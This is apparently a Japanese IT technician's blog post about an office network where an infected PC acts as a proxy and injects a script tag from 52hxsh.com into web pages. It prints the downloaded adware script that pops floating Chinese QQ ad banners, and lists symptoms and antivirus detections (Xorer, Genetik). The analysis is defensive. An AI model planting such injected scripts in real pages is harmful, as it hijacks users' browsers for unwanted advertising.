ウイルス

ブラウザの右下隅に時々中国語の広告が表示されるの続き

HTMLの先頭行に勝手に追加される以下のコード

<script src=”http:://l.52hxsh.com/1.js”></script>

が参照している　1.js　をダウンロードしてみた。

以下がソース

document.writeln(”<center>”);

function brand(a)
{
return parseInt((a)*Math.random()+1);
}

var hgbnum;
hgbnum=brand(8);

if (hgbnum==1)
{
document.writeln(”<div id=\”myads\” style=\”width:209px;height:138px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:138\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb1.gif\” width=\”209\” height=\”138\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-209}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

if (hgbnum==2)
{
document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb2.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

if (hgbnum==3)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq3.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);

document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb9.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

if (hgbnum==4)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq3.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);

document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb3.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

if (hgbnum==5 || hgbnum==6)
{
document.writeln(”<a href=\”http:\/\/ad.hhhqd.net\/qb.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qb4.gif\” width=\”760\” height=\”80\” border=\”0\”><\/a>”);

document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq1.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

if (hgbnum==7 || hgbnum==8)
{
document.writeln(”<div id=\”myads\” style=\”width:200px;height:130px;position:absolute;z-index:30000;bottom:0px;background-color:#ffffff;\”>”);
document.writeln(”<div style=\”height:130\”><a href=\”http:\/\/ad.hhhqd.net\/qq.html\” target=\”_blank\”><img src=\”http:\/\/ok.52hxsh.com\/img\/qq1.gif\” width=\”200\” height=\”130\” border=\”0\”><\/a><\/div>”);
document.writeln(”<\/div>”);
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”function myads(){document.all.myads.style.top=document.body.scrollTop+document.body.clientHeight-130;document.all.myads.style.left=document.body.scrollLeft +document.body.clientWidth-200}”);
document.writeln(”window.setInterval(\”myads()\”,1);”);
document.writeln(”<\/script>”);
}

そして新たに同ネットワーク内で２台の感染が確認された。
感染したPCの症状は

1. 非常に動作が不安定で重い
2. セーフモードではブルースクリーンになって起動できない
   追記：STOPエラーの種類は 0×0000007B　INACCESSIBLE_BOOT_DEVICE
3. NOD32をインストールしようとするとインストールウィザードで”次へ”ボタンをクリックすることができない

このような状態で、単体でチェックすることはできない。

そこで、感染したPCのHDDを取り外し、別のPCに接続してNOD32でスキャンを行った。
結果はexeというexeに感染が確認された。中には未知のウイルスの疑いというのも含まれている。

win32/Genetik 亜種
win32/Xorer 亜種

リストに出てくるのはこの２つばかり。

思ったように調査が進まないので続きはまた後日。

表題の件で訪問依頼。
ああ、なんかのアドウェアにかかったかと見に行ったのだが、今回はちょっと違った。

なんと社内の殆どすべてのPCで同時発生したというのだ。
確認すると、不定期に中国語の広告が表示されている。
ペンギンのマスコットで有名なQQというサイトの広告だ。
夜勤中の中国人実習生が会社の端末で勝手にインターネットをしていたら、翌朝から症状が出始めたとのことだった。

ルータのログを除いていると、定期的にqq.comと52hxsh.comへアクセスした履歴がある。
が、ルータはNTT WebCaster710
こいつのログは１００件程度しかたまらないらしく、あまり参考にならない。
とりあえず上記のURL２つをフィルタして確認すると、広告は表示されなくなった。

それぞれのマシンでマルウェアをスキャンしてみたが、全く引っ掛からない。

しかし、ネットの接続が妙に不安定だ。
頻繁に「サイトが表示できません」とエラーが出て、リロードすると表示される。
担当者に話を聞くと、これも広告が出始めてからの症状だという。
ここでなんとなく読めてきた。

症状が出る時には以下のスクリプトがソースのトップに追記されている。
<script src=”http:://l.52hxsh.com/1.js”></script>

いやびっくり。
初めて見ました。
ウイルスに感染したPCがプロクシの役割をし、htmlをクライアントに渡す際にスクリプトを追記しているようなのです。
問題のPCをネットワークから外せば全く問題なく動き始めました。

今回のケースは、中国人実習生が勝手にPCに触ったことがことの起こり。
触ってはいけないと伝えるのは勿論、話して分かる人間ばかりじゃないため、パスワードロックなどの対策は必要だ。

３月３日追記
<script src=”http:://l.52hxsh.com/1.js”>でGoogle検索したところ、現時点でヒットする文献は中国語サイト３件のみ
この症状または52hxsh.comについて何らかの情報を持っている方はぜひ教えてください。

問題の感染したPCをチェックしようと、 Safemodeで起動しようとするとブルースクリーンでストップ。
通常起動だと普通に起動する。（不安定で細かいチェックは難しい）
システムの一部が改変されているのだろうか？